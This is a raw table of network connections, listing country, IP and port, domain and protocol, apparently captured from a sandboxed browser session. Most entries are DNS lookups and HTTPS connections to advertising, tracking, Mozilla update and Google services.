| US | 172.67.222.12:443 | w.cedeene.com | tcp |
| US | 8.8.8.8:53 | w.cedeene.com | udp |
| GB | 2.21.189.220:443 | z.moatads.com | tcp |
| US | 8.8.8.8:53 | e13136.g.akamaiedge.net | udp |
| DE | 52.57.59.207:443 | b-eu1.marketperf.com | tcp |
| US | 8.8.8.8:53 | pool-gce-nl.ghent.iponweb.net | udp |
| US | 8.8.8.8:53 | w.cedeene.com | udp |
| US | 172.67.222.12:443 | w.cedeene.com | tcp |
| US | 8.8.8.8:53 | cdn.lijit.com | udp |
| US | 8.8.8.8:53 | pool-gce-nl.ghent.iponweb.net | udp |
| US | 8.8.8.8:53 | e13136.g.akamaiedge.net | udp |
| BG | 52.85.5.31:443 | cdn.lijit.com | tcp |
| US | 8.8.8.8:53 | e213908.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | b-eu1.marketperf.com | udp |
| US | 8.8.8.8:53 | d27c6x3b3mm9so.cloudfront.net | udp |
| US | 8.8.8.8:53 | b-eu1.marketperf.com | udp |
| US | 8.8.8.8:53 | e213908.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | d27c6x3b3mm9so.cloudfront.net | udp |
| US | 172.67.222.12:443 | w.cedeene.com | udp |
| US | 8.8.8.8:53 | id.a-mx.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | sync.quantumdex.io | udp |
| NL | 79.127.227.46:443 | id.a-mx.com | tcp |
| US | 8.8.8.8:53 | id.a-mx.com | udp |
| NL | 35.214.230.116:443 | pool-gce-nl.ghent.iponweb.net | tcp |
| NL | 23.62.61.138:443 | e213908.b.akamaiedge.net | tcp |
| IE | 52.31.167.90:443 | imp-ew1-secondary.lijit.com | tcp |
| US | 8.8.8.8:53 | ce.lijit.com | udp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| US | 104.22.36.96:443 | sync.quantumdex.io | tcp |
| US | 8.8.8.8:53 | id.a-mx.com | udp |
| US | 8.8.8.8:53 | sync.quantumdex.io | udp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| IE | 52.17.116.73:443 | ce.lijit.com | tcp |
| US | 8.8.8.8:53 | raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com | udp |
| DE | 141.95.98.64:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | sync.cootlogix.com | udp |
| US | 151.101.65.108:443 | acdn.adnxs.com | tcp |
| DE | 162.55.236.225:443 | sync.richaudience.com | tcp |
| US | 8.8.8.8:53 | sync.quantumdex.io | udp |
| US | 8.8.8.8:53 | prod.appnexus.map.fastly.net | udp |
| US | 8.8.8.8:53 | raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com | udp |
| US | 143.198.113.219:443 | sync.cootlogix.com | tcp |
| US | 8.8.8.8:53 | 12.222.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.59.57.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.5.85.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.227.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.230.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.167.31.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.36.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.116.17.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.65.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.appnexus.map.fastly.net | udp |
| US | 8.8.8.8:53 | user-data-eu.bidswitch.net | udp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| US | 8.8.8.8:53 | user-data-eu.bidswitch.net | udp |
| US | 8.8.8.8:53 | h7mzk9dlb.puzztake.com | udp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| US | 104.22.36.96:443 | sync.quantumdex.io | udp |
| US | 8.8.8.8:53 | h7mzk9dlb.puzztake.com | udp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| US | 8.8.8.8:53 | ssp.disqus.com | udp |
| BG | 18.165.61.121:443 | s.ad.smaato.net | tcp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| US | 107.21.64.213:443 | ssp.disqus.com | tcp |
| US | 8.8.8.8:53 | zeta-ssp-385516103.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | match-eu-central-1-ecs.sharethrough.com | udp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| DE | 162.55.236.225:443 | sync.richaudience.com | tcp |
| US | 8.8.8.8:53 | match-eu-central-1-ecs.sharethrough.com | udp |
| US | 8.8.8.8:53 | zeta-ssp-385516103.us-east-1.elb.amazonaws.com | udp |
| NL | 35.214.149.91:443 | user-data-eu.bidswitch.net | tcp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | sync.adkernel.com | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 104.18.36.155:443 | ssum-sec.casalemedia.com | tcp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| DE | 3.122.213.30:443 | match-eu-central-1-ecs.sharethrough.com | tcp |
| US | 13.248.245.213:443 | eb2.3lift.com | tcp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | 1.cpm.ak-is2.net | udp |
| US | 8.8.8.8:53 | eu-eb2.3lift.com | udp |
| US | 104.18.36.155:443 | ssum-sec.casalemedia.com | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | 1.cpm.ak-is2.net | udp |
| US | 8.8.8.8:53 | eu-eb2.3lift.com | udp |
| US | 8.8.8.8:53 | ads.betweendigital.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | cs-server-s2s.yellowblue.io | udp |
| GB | 2.21.188.239:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | e6603.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | ssp.ads.betweendigital.com | udp |
| NL | 188.42.191.196:443 | ssp.ads.betweendigital.com | tcp |
| US | 8.8.8.8:53 | e6603.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | cs-server-s2s.yellowblue.io | udp |
| US | 184.72.174.29:443 | cs-server-s2s.yellowblue.io | tcp |
| US | 8.8.8.8:53 | ssp.ads.betweendigital.com | udp |
| US | 8.8.8.8:53 | cs-server-s2s.yellowblue.io | udp |
| US | 8.8.8.8:53 | 219.113.198.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.61.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.236.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.64.21.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.149.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.36.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.9.89.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.57.245.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.245.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.191.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eexsync.com | udp |
| US | 80.77.87.108:443 | eexsync.com | tcp |
| US | 8.8.8.8:53 | eexsync.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | eexsync.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | sync.sharethis.com | udp |
| US | 8.8.8.8:53 | aqfer.lijit.com | udp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.com | udp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| IE | 34.241.72.243:443 | sync.sharethis.com | tcp |
| US | 8.8.8.8:53 | ssbsync-global.smartadserver.com | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| US | 8.8.8.8:53 | httplogserver-lb.global.unified-prod.sharethis.net | udp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.net.akadns.net | udp |
| US | 80.77.87.163:443 | cs.admanmedia.com | tcp |
| NL | 23.62.61.194:443 | aqfer.lijit.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | udp |
| US | 172.67.40.173:443 | spl.zeotap.com | tcp |
| US | 8.8.8.8:53 | pixel.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | httplogserver-lb.global.unified-prod.sharethis.net | udp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | pixel-origin.mathtag.com | udp |
| US | 8.8.8.8:53 | pixel-origin.mathtag.com | udp |
| US | 8.8.8.8:53 | dorpat.geo.iponweb.net | udp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| NL | 35.214.199.88:443 | dorpat.geo.iponweb.net | tcp |
| US | 74.121.140.211:443 | pixel-origin.mathtag.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.net.akadns.net | tcp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.net.akadns.net | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| FR | 154.54.250.80:443 | ads.stickyadstv.com | tcp |
| NL | 89.149.192.75:443 | ssbsync-global.smartadserver.com | tcp |
| GB | 185.64.191.214:443 | image8.pubmatic.com | tcp |
| US | 52.46.151.131:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | outspot2-ams.adx.opera.com | udp |
| US | 8.8.8.8:53 | dorpat.geo.iponweb.net | udp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| US | 8.8.8.8:53 | outspot2-ams.adx.opera.com | udp |
| NL | 35.214.199.88:443 | dorpat.geo.iponweb.net | udp |
| US | 8.8.8.8:53 | ssbsync-euw1.smartadserver.com | udp |
| US | 8.8.8.8:53 | imagsync-lhrpairbc.pubmatic.com | udp |
| US | 8.8.8.8:53 | eu-west-dual.ads.stickyadstv.com.akadns.net | udp |
| US | 8.8.8.8:53 | imagsync-lhrpairbc.pubmatic.com | udp |
| US | 8.8.8.8:53 | eu-west-dual.ads.stickyadstv.com.akadns.net | udp |
| US | 8.8.8.8:53 | 239.188.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.174.72.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.72.241.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.40.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.191.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.250.54.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.192.149.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.199.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | ssbsync-euw1.smartadserver.com | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| DE | 3.124.210.90:443 | ps.eyeota.net | tcp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| US | 8.8.8.8:53 | cs.yellowblue.io | udp |
| IE | 54.170.105.17:443 | cs.yellowblue.io | tcp |
| US | 8.8.8.8:53 | cs.yellowblue.io | udp |
| US | 8.8.8.8:53 | cs.yellowblue.io | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| DE | 141.95.33.120:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | px.moatads.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| GB | 2.21.189.220:443 | px.moatads.com | tcp |
| US | 8.8.8.8:53 | 211.140.121.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.151.46.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.210.124.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.105.170.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.33.95.141.in-addr.arpa | udp |
| US | 104.22.58.199:443 | s3.vlitag.com | udp |
| US | 8.8.8.8:53 | imp-ew1-primary.lijit.com | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| IE | 34.248.105.146:443 | imp-ew1-primary.lijit.com | tcp |
| NL | 35.214.149.91:443 | user-data-eu.bidswitch.net | tcp |
| NL | 23.62.61.138:443 | aqfer.lijit.com | tcp |
| NL | 23.62.61.138:443 | aqfer.lijit.com | tcp |
| US | 8.8.8.8:53 | 146.105.248.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e1.marketperf.com | udp |
| FR | 178.33.36.247:443 | e1.marketperf.com | tcp |
| FR | 178.33.36.247:443 | e1.marketperf.com | tcp |
| US | 8.8.8.8:53 | e1.marketperf.com | udp |
| US | 8.8.8.8:53 | e1.marketperf.com | udp |
| US | 8.8.8.8:53 | 247.36.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | style.ad6.fr | udp |
| FR | 5.135.94.16:443 | style.ad6.fr | tcp |
| US | 8.8.8.8:53 | style.ad6.fr | udp |
| US | 8.8.8.8:53 | style.ad6.fr | udp |
| US | 8.8.8.8:53 | cimg.audiencerun.com | udp |
| US | 8.8.8.8:53 | cimg.audiencerun.com | udp |
| FR | 5.135.94.16:443 | cimg.audiencerun.com | tcp |
| US | 8.8.8.8:53 | cimg.audiencerun.com | udp |
| US | 8.8.8.8:53 | 16.94.135.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| FR | 178.33.36.247:443 | e1.marketperf.com | tcp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| NL | 2.18.121.79:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r1---sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.166:443 | r1---sn-aigl6ney.gvt1.com | tcp |
| US | 8.8.8.8:53 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.166:443 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | 79.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.183.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 53.121.117.34.in-addr.arpa | udp |
| US | 172.67.21.227:443 | s3.vlitag.com | udp |
| US | 172.67.21.227:443 | s3.vlitag.com | udp |
| US | 104.22.58.199:443 | s3.vlitag.com | udp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 172.67.21.227:443 | s3.vlitag.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | udp |
| DE | 141.101.120.11:443 | px.vliplatform.com | udp |
| US | 8.8.8.8:53 | jsdelivr.map.fastly.net | udp |
| US | 8.8.8.8:53 | jsdelivr.map.fastly.net | udp |
| US | 134.209.74.245:443 | exchange.cootlogix.com | tcp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 104.22.37.96:443 | sync.quantumdex.io | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| DE | 37.252.171.149:443 | ib.anycast.adnxs.com | tcp |
| US | 8.8.8.8:53 | 144.224.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e38fc80ec49049e1d59e6ce56c93531e.safeframe.googlesyndication.com | udp |
| GB | 172.217.169.65:443 | e38fc80ec49049e1d59e6ce56c93531e.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | a.teads.tv | udp |
| US | 8.8.8.8:53 | e9957.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | e9957.b.akamaiedge.net | udp |
| GB | 172.217.169.65:443 | e38fc80ec49049e1d59e6ce56c93531e.safeframe.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 151.101.65.229:443 | jsdelivr.map.fastly.net | udp |
| US | 8.8.8.8:53 | b.marketperf.com | udp |
| US | 8.8.8.8:53 | ghent-gce-sc.bidswitch.net | udp |
| US | 8.8.8.8:53 | pxdrop.lijit.com | udp |
| US | 8.8.8.8:53 | quantumsyndication.com | udp |
| US | 8.8.8.8:53 | imp-ue1-secondary.lijit.com | udp |
| US | 3.143.152.62:443 | b.marketperf.com | tcp |
| US | 104.26.7.132:443 | quantumsyndication.com | tcp |
| US | 8.8.8.8:53 | e213908.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | quantumsyndication.com | udp |
| US | 8.8.8.8:53 | b.marketperf.com | udp |
| US | 8.8.8.8:53 | e213908.b.akamaiedge.net | udp |
| US | 8.8.8.8:53 | quantumsyndication.com | udp |
| US | 34.111.60.239:443 | images.mediago.io | udp |
| US | 8.8.8.8:53 | blackbird-prd-ue1-alb-1973039460.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | pool-gce-sc.ghent.iponweb.net | udp |
| US | 104.26.7.132:443 | quantumsyndication.com | udp |
| US | 35.211.200.231:443 | pool-gce-sc.ghent.iponweb.net | tcp |
| US | 35.174.103.56:443 | imp-ue1-secondary.lijit.com | tcp |
| US | 8.8.8.8:53 | 132.7.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.152.143.3.in-addr.arpa | udp |
| FR | 178.33.36.247:443 | e1.marketperf.com | tcp |
| US | 8.8.8.8:53 | ts.amazon-adsystem.com | udp |
| BG | 18.165.61.116:443 | ts.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | d21t3ooy68jlh9.cloudfront.net | udp |
| US | 8.8.8.8:53 | d21t3ooy68jlh9.cloudfront.net | udp |
| US | 8.8.8.8:53 | 56.103.174.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.200.211.35.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 116.61.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0ab41e68e5196faf86c2102a02dc934d.safeframe.googlesyndication.com | udp |
| GB | 172.217.169.65:443 | 0ab41e68e5196faf86c2102a02dc934d.safeframe.googlesyndication.com | tcp |
| GB | 172.217.169.65:443 | 0ab41e68e5196faf86c2102a02dc934d.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | d1ykf07e75w7ss.cloudfront.net | udp |
| US | 8.8.8.8:53 | d1ykf07e75w7ss.cloudfront.net | udp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | sync.taboola.com | udp |
| US | 104.18.36.155:443 | dsum-sec.casalemedia.com | tcp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| NL | 141.226.228.48:443 | sync.taboola.com | tcp |
| US | 8.8.8.8:53 | am-vip001.taboola.com | udp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | am-vip001.taboola.com | udp |
| US | 104.18.36.155:443 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | 48.228.226.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sq-tungsten-ts-eu.amazon-adsystem.com | udp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| BG | 52.85.5.30:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| US | 8.8.8.8:53 | d5je4of8ee8uu.cloudfront.net | udp |
| IE | 3.254.236.173:443 | sq-tungsten-ts-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | sq-tungsten-ts-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | sq-tungsten-ts-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | d5je4of8ee8uu.cloudfront.net | udp |
| BG | 52.85.5.30:443 | d5je4of8ee8uu.cloudfront.net | tcp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | sync.outbrain.com | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 64.74.236.191:443 | sync.outbrain.com | tcp |
| US | 8.8.8.8:53 | chidc2.outbrain.org | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | chidc2.outbrain.org | udp |
| US | 8.8.8.8:53 | 173.236.254.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.5.85.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.236.74.64.in-addr.arpa | udp |
| NL | 79.127.227.46:443 | id.a-mx.com | tcp |
| US | 143.198.113.219:443 | h7mzk9dlb.puzztake.com | tcp |
| US | 8.8.8.8:53 | ce.lijit.com | udp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| US | 104.22.36.96:443 | sync.quantumdex.io | udp |
| US | 8.8.8.8:53 | raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | prod.appnexus.map.fastly.net | udp |
| US | 8.8.8.8:53 | raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | prod.appnexus.map.fastly.net | udp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| DE | 141.95.98.64:443 | lb.eu-1-id5-sync.com | tcp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | c3.a-mo.net | udp |
| US | 8.8.8.8:53 | trace-eu.mediago.io | udp |
| DE | 79.127.216.47:443 | c3.a-mo.net | tcp |
| US | 8.8.8.8:53 | id.a-mx.com | udp |
| US | 8.8.8.8:53 | trace-eu.mediago.io | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | match-eu-central-1-ecs.sharethrough.com | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | match-eu-central-1-ecs.sharethrough.com | udp |
| US | 8.8.8.8:53 | ssp.disqus.com | udp |
| NL | 77.245.57.72:443 | 1.cpm.ak-is2.net | tcp |
| NL | 77.245.57.72:443 | 1.cpm.ak-is2.net | tcp |
| NL | 77.245.57.72:443 | 1.cpm.ak-is2.net | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| DE | 141.95.33.120:443 | lb.eu-1-id5-sync.com | tcp |
| FR | 178.250.7.13:443 | dnacdn.net | tcp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| NL | 77.245.57.72:443 | 1.cpm.ak-is2.net | tcp |
| US | 8.8.8.8:53 | e6603.g.akamaiedge.net | udp |
| US | 80.77.87.108:443 | eexsync.com | tcp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | e6603.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | zeta-ssp-385516103.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | zeta-ssp-385516103.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | d1jvc9b8z3vcjs.cloudfront.net | udp |
| US | 8.8.8.8:53 | 47.216.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d1jvc9b8z3vcjs.cloudfront.net | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | udp |
| GB | 172.217.169.65:443 | 0ab41e68e5196faf86c2102a02dc934d.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 216.58.213.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.213.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | e1.marketperf.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cdn.mediago.io | udp |
| US | 8.8.8.8:53 | 2.213.58.216.in-addr.arpa | udp |
| GB | 216.58.213.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cdn.mediago.io | udp |
| US | 8.8.8.8:53 | cdn.mediago.io | udp |
| FR | 178.33.36.247:443 | e1.marketperf.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
